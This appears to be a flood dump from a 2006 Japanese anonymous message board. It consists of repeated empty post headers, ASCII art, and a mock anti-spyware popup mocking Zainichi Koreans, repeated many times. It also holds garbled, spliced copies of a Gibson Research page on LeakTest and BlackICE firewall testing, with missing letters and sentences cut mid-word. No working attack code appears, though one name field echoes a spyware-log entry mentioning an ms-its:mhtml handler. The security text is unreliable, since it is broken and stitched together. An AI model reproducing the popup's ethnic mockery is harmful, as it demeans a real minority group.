28 名前: [] 投稿日:2006/08/22(火) 11:31:53 ID:SxlHVTLA
27 名前: [sage] 投稿日:2006/08/22(火) 11:31:22 ID:SxlHVTLA
26 名前: [] 投稿日:2006/08/22(火) 11:30:36 ID:SxlHVTLA
25 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:30:06 ID:SxlHVTLA
24 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:29:31 ID:SxlHVTLA
23 名前: 。[sage] 投稿日:2006/08/22(火) 11:28:54 ID:SxlHVTLA
22 名前: [] 投稿日:2006/08/22(火) 11:28:06 ID:SxlHVTLA
21 名前: 。[sage] 投稿日:2006/08/22(火) 11:27:33 ID:SxlHVTLA
20 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:27:02 ID:SxlHVTLA
19 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:25:16 ID:SxlHVTLA
3 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:45:54 ID:QgXodIPB
862 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:44:06 ID:QgXodIPB
861 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:34 ID:QgXodIPB
860 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:01 ID:QgXodIPB
859 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:42:00 ID:QgXodIPB
858 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:41:15 ID:QgXodIPB
857 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:40:40 ID:QgXodIPB
巛王 \"ヽ-;:,,,,,,ノ
__(●)(●)((●)((●))(●)(●)(●)ii● l(●)(●)(●)__
/ (●)(●)(●)(●)(●))(●)(●)(●゙'‐='"(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)(●)))(●)(●)(●)(●)_
/ (●)(●)(●)(●)(●))(●)(◎)(●))(●)(●)(●)(●) \
(●)((ii ,●l)(●))(●)(●)(●)(●)(●)(●)(●)
/ (●)(●)(●)(●)(●))(●)(●,,r==、(●)(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)ii ● ))(●)(●)(●)(●)_
/ (●)(●)(丿"~"i i(●)(●)(●)゙'‐='"(●)(●)(●)(●) \
_(●)(●)(",, )(X)ヽヽ(●))(●)(●))(●)(●)(●)(●)_
(●)(●)\ ヽXヽヽ(●))(●)(●)(≡)(≡)(●)(●)
__(●)(●)((●\ヽ Xヽヽ(●)((●))(●)(●)(ミ)(●)__
/ (●)(●),,r==、)( \,",",ソ●(●))(●),,r==、●)(●) \
_ (●)(●)ii ,●l)(●)(●)(●)(●)))(●ii● ;)(●)(●)_
/ (●)(●)゙'‐='"(●)(●))(●)(●)(●))((゙'‐='"(●)(●) \
/ (l●)(●)(●),,r==、)(●)(●)(●)(,,r==、)(●)(●l;) \
| . (l;●)(●)(● ,● ))(●))(●)(●)ii ● l)(●)(●) |
06/08/23 08:34:45 Wy2TA+nN
173 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/23(水) 08:32:31 ID:Wy2TA+nN
72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 21:43:26 ID:8TY2Dt6A
130 名前:DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml[] 投稿日:2006/08/22(火) 14:25:32 ID:9eaKdgnF
33 名前: [] 投稿日:2006/08/22(火) 11:35:06 ID:SxlHVTLA
32 名前: [] 投稿日:2006/08/22(火) 11:34:30 ID:SxlHVTLA
31 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:59 ID:SxlHVTLA
30 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:04 ID:SxlHVTLA
29 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:32:24 ID:SxlHVTLA
28 名前: [] 投稿日:2006/08/22(火) 11:31:53 ID:SxlHVTLA
27 名前: [sage] 投稿日:2006/08/22(火) 11:31:22 ID:SxlHVTLA
26 名前: [] 投稿日:2006/08/22(火) 11:30:36 ID:SxlHVTLA
25 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:30:06 ID:SxlHVTLA
24 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:29:31 ID:SxlHVTLA
23 名前: 。[sage] 投稿日:2006/08/22(火) 11:28:54 ID:SxlHVTLA
22 名前: [] 投稿日:2006/08/22(火) 11:28:06 ID:SxlHVTLA
21 名前: 。[sage] 投稿日:2006/08/22(火) 11:27:33 ID:SxlHVTLA
20 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:27:02 ID:SxlHVTLA
19 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:25:16 ID:SxlHVTLA
3 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:45:54 ID:QgXodIPB
862 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:44:06 ID:QgXodIPB
861 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:34 ID:QgXodIPB
860 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:01 ID:QgXodIPB
859 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:42:00 ID:QgXodIPB
858 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:41:15 ID:QgXodIPB
857 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:40:40 ID:QgXodIPB
巛王 \"ヽ-;:,,,,,,ノ
__(●)(●)((●)((●))(●)(●)(●)ii● l(●)(●)(●)__
/ (●)(●)(●)(●)(●))(●)(●)(●゙'‐='"(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)(●)))(●)(●)(●)(●)_
/ (●)(●)(●)(●)(●))(●)(◎)(●))(●)(●)(●)(●) \
(●)((ii ,●l)(●))(●)(●)(●)(●)(●)(●)(●)
/ (●)(●)(●)(●)(●))(●)(●,,r==、(●)(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)ii ● ))(●)(●)(●)(●)_
/ (●)(●)(丿"~"i i(●)(●)(●)゙'‐='"(●)(●)(●)(●) \
_(●)(●)(",, )(X)ヽヽ(●))(●)(●))(●)(●)(●)(●)_
(●)(●)\ ヽXヽヽ(●))(●)(●)(≡)(≡)(●)(●)
__(●)(●)((●\ヽ Xヽヽ(●)((●))(●)(●)(ミ)(●)__
/ (●)(●),,r==、)( \,",",ソ●(●))(●),,r==、●)(●) \
_ (●)(●)ii ,●l)(●)(●)(●)(●)))(●ii● ;)(●)(●)_
/ (●)(●)゙'‐='"(●)(●))(●)(●)(●))((゙'‐='"(●)(●) \
/ (l●)(●)(●),,r==、)(●)(●)(●)(,,r==、)(●)(●l;) \
| . (l;●)(●)(● ,● ))(●))(●)(●)ii ● l)(●)(●) |
06/08/23 08:36:06 Wy2TA+nN
173 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/23(水) 08:32:31 ID:Wy2TA+nN
72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 21:43:26 ID:8TY2Dt6A
130 名前:DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml[] 投稿日:2006/08/22(火) 14:25:32 ID:9eaKdgnF
33 名前: [] 投稿日:2006/08/22(火) 11:35:06 ID:SxlHVTLA
32 名前: [] 投稿日:2006/08/22(火) 11:34:30 ID:SxlHVTLA
31 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:59 ID:SxlHVTLA
30 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:33:04 ID:SxlHVTLA
29 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:32:24 ID:SxlHVTLA
28 名前: [] 投稿日:2006/08/22(火) 11:31:53 ID:SxlHVTLA
27 名前: [sage] 投稿日:2006/08/22(火) 11:31:22 ID:SxlHVTLA
26 名前: [] 投稿日:2006/08/22(火) 11:30:36 ID:SxlHVTLA
25 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/08/22(火) 11:30:06 ID:SxlHVTLA
24 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:29:31 ID:SxlHVTLA
23 名前: 。[sage] 投稿日:2006/08/22(火) 11:28:54 ID:SxlHVTLA
22 名前: [] 投稿日:2006/08/22(火) 11:28:06 ID:SxlHVTLA
21 名前: 。[sage] 投稿日:2006/08/22(火) 11:27:33 ID:SxlHVTLA
20 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:27:02 ID:SxlHVTLA
19 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 11:25:16 ID:SxlHVTLA
3 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:45:54 ID:QgXodIPB
862 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:44:06 ID:QgXodIPB
861 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:34 ID:QgXodIPB
860 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:43:01 ID:QgXodIPB
859 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:42:00 ID:QgXodIPB
858 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:41:15 ID:QgXodIPB
857 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/08/22(火) 10:40:40 ID:QgXodIPB
巛王 \"ヽ-;:,,,,,,ノ
__(●)(●)((●)((●))(●)(●)(●)ii● l(●)(●)(●)__
/ (●)(●)(●)(●)(●))(●)(●)(●゙'‐='"(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)(●)))(●)(●)(●)(●)_
/ (●)(●)(●)(●)(●))(●)(◎)(●))(●)(●)(●)(●) \
(●)((ii ,●l)(●))(●)(●)(●)(●)(●)(●)(●)
/ (●)(●)(●)(●)(●))(●)(●,,r==、(●)(●)(●)(●) \
_ (●)(●)(●)(●)(●)(●)(●)ii ● ))(●)(●)(●)(●)_
/ (●)(●)(丿"~"i i(●)(●)(●)゙'‐='"(●)(●)(●)(●) \
_(●)(●)(",, )(X)ヽヽ(●))(●)(●))(●)(●)(●)(●)_
(●)(●)\ ヽXヽヽ(●))(●)(●)(≡)(≡)(●)(●)
__(●)(●)((●\ヽ Xヽヽ(●)((●))(●)(●)(ミ)(●)__
/ (●)(●),,r==、)( \,",",ソ●(●))(●),,r==、●)(●) \
_ (●)(●)ii ,●l)(●)(●)(●)(●)))(●ii● ;)(●)(●)_
/ (●)(●)゙'‐='"(●)(●))(●)(●)(●))((゙'‐='"(●)(●) \
/ (l●)(●)(●),,r==、)(●)(●)(●)(,,r==、)(●)(●l;) \
| . (l;●)(●)(● ,● ))(●))(●)(●)ii ● l)(●)(●) |
06/08/23 08:49:21 Wy2TA+nN
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
06/08/23 08:49:56 Wy2TA+nN
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
06/08/23 08:50:29 Wy2TA+nN
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
06/08/23 08:51:12 Wy2TA+nN
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
│││││┝┥SGアンチスパイ [×]|
┤│││││┝━━━━━━━━━| \カチ
└┤│││││┌──―┐ ´||`| カチ
└┤│││││ Λ_Λ | 在日に住み着かれました。 │ カチ
└┤││││<=( ´∀`) | 謝罪と賠償するまで │ カチ
└┤│││( ) │ 終了はできません。 | カチ
└┤│└──┘ | カチ
└┤ [謝罪する] [賠償する] | カチ
06/08/23 08:51:55 Wy2TA+nN
A recent BlackICE purchaser wrote to us:
"As someone who has recently purchased blackice defender, I was understandably worried by Steve's derogatory remarks
about the program and it's functioning. So I mailed them [ISS/NetworkICE] and asked for comment. I paste it here un-altered, f
or whoever may wish to read it."
For those who are interested, here is the reply this BID user reportedly received from the
anonymous "Trish M." at BlackICE Technical Support in reply to his concerns, followed by
the reply I sent back to him (non-anonymously):
BID's Official Response & My Reply
October 25, 2001
LeakTest and the Windows XP Built-In Firewall
The Windows XP built-in firewall:
The rate of LeakTest downloads jumped significantly on October 25th, 2001, presumably due to the release of Windows XP on
that date.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curious to learn about their new system and its Internet defenses.
Just so you know, WinXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
Internet (it has "stealth mode" unsolicited packet handling), but you will still need to
use a good third-party personal firewall if you wish to manage and control outbound
connections from your system.
Introducing LeakTest
his site has been most well-known for its FREE ShieldsUP! Internet security test. Crucial
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
privacy invading commercial spyware. As a result, it is no longer true that all of the
potential problems reside outside the computer.hfully test for LeakTest's outbound communications. As far as we know, BID
has no such
cpability. So it appears to have been designed merely to mislead and hide that truth from
ts usrs.
his IP address-specific blocking could have falsely lead BID's users into believing that
their updated BID firewall was now providing the sort of outbound blocking, protection, an
d awareness that LeakTest was designed to detect, test, and report. (And which all effective personal firewalls provide.)
lthough we would celebrate the addition of true outbound application-aware control and
blocking to BID, achieving that sort of protection is significantly more difficult ? and
certainly far more valuable to its users ? than blocking a single IP address at Gibson
Research Corp. in order to falsely appear to be doing more than they are.
eakTest Version 1.1:
Shortly after we learned of and confirmed this unfortunate decision on the part of
NetworkICE's developers, we updated the original LeakTest v1.0 to version 1.1 by simply presumably also could.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curio
us to learn about their new system and its Internet defenses.
Just so you know, WnXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
rivacy invading commercial spyware. As a result, it is no longer true that all of the
06/08/23 08:57:12 Wy2TA+nN
A recent BlackICE purchaser wrote to us:
"As someone who has recently purchased blackice defender, I was understandably worried by Steve's derogatory remarks
about the program and it's functioning. So I mailed them [ISS/NetworkICE] and asked for comment. I paste it here un-altered, f
or whoever may wish to read it."
For those who are interested, here is the reply this BID user reportedly received from the
anonymous "Trish M." at BlackICE Technical Support in reply to his concerns, followed by
the reply I sent back to him (non-anonymously):
BID's Official Response & My Reply
October 25, 2001
LeakTest and the Windows XP Built-In Firewall
The Windows XP built-in firewall:
The rate of LeakTest downloads jumped significantly on October 25th, 2001, presumably due to the release of Windows XP on
that date.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curious to learn about their new system and its Internet defenses.
Just so you know, WinXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
Internet (it has "stealth mode" unsolicited packet handling), but you will still need to
use a good third-party personal firewall if you wish to manage and control outbound
connections from your system.
Introducing LeakTest
his site has been most well-known for its FREE ShieldsUP! Internet security test. Crucial
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
privacy invading commercial spyware. As a result, it is no longer true that all of the
potential problems reside outside the computer.hfully test for LeakTest's outbound communications. As far as we know, BID
has no such
cpability. So it appears to have been designed merely to mislead and hide that truth from
ts usrs.
his IP address-specific blocking could have falsely lead BID's users into believing that
their updated BID firewall was now providing the sort of outbound blocking, protection, an
d awareness that LeakTest was designed to detect, test, and report. (And which all effective personal firewalls provide.)
lthough we would celebrate the addition of true outbound application-aware control and
blocking to BID, achieving that sort of protection is significantly more difficult ? and
certainly far more valuable to its users ? than blocking a single IP address at Gibson
Research Corp. in order to falsely appear to be doing more than they are.
eakTest Version 1.1:
Shortly after we learned of and confirmed this unfortunate decision on the part of
NetworkICE's developers, we updated the original LeakTest v1.0 to version 1.1 by simply presumably also could.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curio
us to learn about their new system and its Internet defenses.
Just so you know, WnXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
rivacy invading commercial spyware. As a result, it is no longer true that all of the
06/08/23 09:01:13 Wy2TA+nN
A recent BlackICE purchaser wrote to us:
"As someone who has recently purchased blackice defender, I was understandably worried by Steve's derogatory remarks
about the program and it's functioning. So I mailed them [ISS/NetworkICE] and asked for comment. I paste it here un-altered, f
or whoever may wish to read it."
For those who are interested, here is the reply this BID user reportedly received from the
anonymous "Trish M." at BlackICE Technical Support in reply to his concerns, followed by
the reply I sent back to him (non-anonymously):
BID's Official Response & My Reply
October 25, 2001
LeakTest and the Windows XP Built-In Firewall
The Windows XP built-in firewall:
The rate of LeakTest downloads jumped significantly on October 25th, 2001, presumably due to the release of Windows XP on
that date.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curious to learn about their new system and its Internet defenses.
Just so you know, WinXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
Internet (it has "stealth mode" unsolicited packet handling), but you will still need to
use a good third-party personal firewall if you wish to manage and control outbound
connections from your system.
Introducing LeakTest
his site has been most well-known for its FREE ShieldsUP! Internet security test. Crucial
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
privacy invading commercial spyware. As a result, it is no longer true that all of the
potential problems reside outside the computer.hfully test for LeakTest's outbound communications. As far as we know, BID
has no such
cpability. So it appears to have been designed merely to mislead and hide that truth from
ts usrs.
his IP address-specific blocking could have falsely lead BID's users into believing that
their updated BID firewall was now providing the sort of outbound blocking, protection, an
d awareness that LeakTest was designed to detect, test, and report. (And which all effective personal firewalls provide.)
lthough we would celebrate the addition of true outbound application-aware control and
blocking to BID, achieving that sort of protection is significantly more difficult ? and
certainly far more valuable to its users ? than blocking a single IP address at Gibson
Research Corp. in order to falsely appear to be doing more than they are.
eakTest Version 1.1:
Shortly after we learned of and confirmed this unfortunate decision on the part of
NetworkICE's developers, we updated the original LeakTest v1.0 to version 1.1 by simply presumably also could.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curio
us to learn about their new system and its Internet defenses.
Just so you know, WnXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
rivacy invading commercial spyware. As a result, it is no longer true that all of the
06/08/23 09:01:47 Wy2TA+nN
A recent BlackICE purchaser wrote to us:
"As someone who has recently purchased blackice defender, I was understandably worried by Steve's derogatory remarks
about the program and it's functioning. So I mailed them [ISS/NetworkICE] and asked for comment. I paste it here un-altered, f
or whoever may wish to read it."
For those who are interested, here is the reply this BID user reportedly received from the
anonymous "Trish M." at BlackICE Technical Support in reply to his concerns, followed by
the reply I sent back to him (non-anonymously):
BID's Official Response & My Reply
October 25, 2001
LeakTest and the Windows XP Built-In Firewall
The Windows XP built-in firewall:
The rate of LeakTest downloads jumped significantly on October 25th, 2001, presumably due to the release of Windows XP on
that date.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curious to learn about their new system and its Internet defenses.
Just so you know, WinXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
Internet (it has "stealth mode" unsolicited packet handling), but you will still need to
use a good third-party personal firewall if you wish to manage and control outbound
connections from your system.
Introducing LeakTest
his site has been most well-known for its FREE ShieldsUP! Internet security test. Crucial
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
privacy invading commercial spyware. As a result, it is no longer true that all of the
potential problems reside outside the computer.hfully test for LeakTest's outbound communications. As far as we know, BID
has no such
cpability. So it appears to have been designed merely to mislead and hide that truth from
ts usrs.
his IP address-specific blocking could have falsely lead BID's users into believing that
their updated BID firewall was now providing the sort of outbound blocking, protection, an
d awareness that LeakTest was designed to detect, test, and report. (And which all effective personal firewalls provide.)
lthough we would celebrate the addition of true outbound application-aware control and
blocking to BID, achieving that sort of protection is significantly more difficult ? and
certainly far more valuable to its users ? than blocking a single IP address at Gibson
Research Corp. in order to falsely appear to be doing more than they are.
eakTest Version 1.1:
Shortly after we learned of and confirmed this unfortunate decision on the part of
NetworkICE's developers, we updated the original LeakTest v1.0 to version 1.1 by simply presumably also could.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curio
us to learn about their new system and its Internet defenses.
Just so you know, WnXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
rivacy invading commercial spyware. As a result, it is no longer true that all of the
06/08/23 09:02:20 Wy2TA+nN
A recent BlackICE purchaser wrote to us:
"As someone who has recently purchased blackice defender, I was understandably worried by Steve's derogatory remarks
about the program and it's functioning. So I mailed them [ISS/NetworkICE] and asked for comment. I paste it here un-altered, f
or whoever may wish to read it."
For those who are interested, here is the reply this BID user reportedly received from the
anonymous "Trish M." at BlackICE Technical Support in reply to his concerns, followed by
the reply I sent back to him (non-anonymously):
BID's Official Response & My Reply
October 25, 2001
LeakTest and the Windows XP Built-In Firewall
The Windows XP built-in firewall:
The rate of LeakTest downloads jumped significantly on October 25th, 2001, presumably due to the release of Windows XP on
that date.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curious to learn about their new system and its Internet defenses.
Just so you know, WinXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
Internet (it has "stealth mode" unsolicited packet handling), but you will still need to
use a good third-party personal firewall if you wish to manage and control outbound
connections from your system.
Introducing LeakTest
his site has been most well-known for its FREE ShieldsUP! Internet security test. Crucial
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
privacy invading commercial spyware. As a result, it is no longer true that all of the
potential problems reside outside the computer.hfully test for LeakTest's outbound communications. As far as we know, BID
has no such
cpability. So it appears to have been designed merely to mislead and hide that truth from
ts usrs.
his IP address-specific blocking could have falsely lead BID's users into believing that
their updated BID firewall was now providing the sort of outbound blocking, protection, an
d awareness that LeakTest was designed to detect, test, and report. (And which all effective personal firewalls provide.)
lthough we would celebrate the addition of true outbound application-aware control and
blocking to BID, achieving that sort of protection is significantly more difficult ? and
certainly far more valuable to its users ? than blocking a single IP address at Gibson
Research Corp. in order to falsely appear to be doing more than they are.
eakTest Version 1.1:
Shortly after we learned of and confirmed this unfortunate decision on the part of
NetworkICE's developers, we updated the original LeakTest v1.0 to version 1.1 by simply presumably also could.
It is understandable that new Internet savvy users of Windows XP, who are aware of our work here at grc.com, would be curio
us to learn about their new system and its Internet defenses.
Just so you know, WnXP's built-in firewall does not attempt to manage or restrict outbound
connections at all. It appears to be a useful firewall for hiding the machine from the
as it is to protect yourself from malicious hackers outside, those bad guys represent only
half of the threat. The Internet has proven to be an extremely fertile transportation
medium for all manner of nasty Trojan horse programs, rapidly proliferating viruses, and
rivacy invading commercial spyware. As a result, it is no longer true that all of the
06/08/23 09:06:59 Wy2TA+nN
A recent BlackICE purchaser wrote to us:
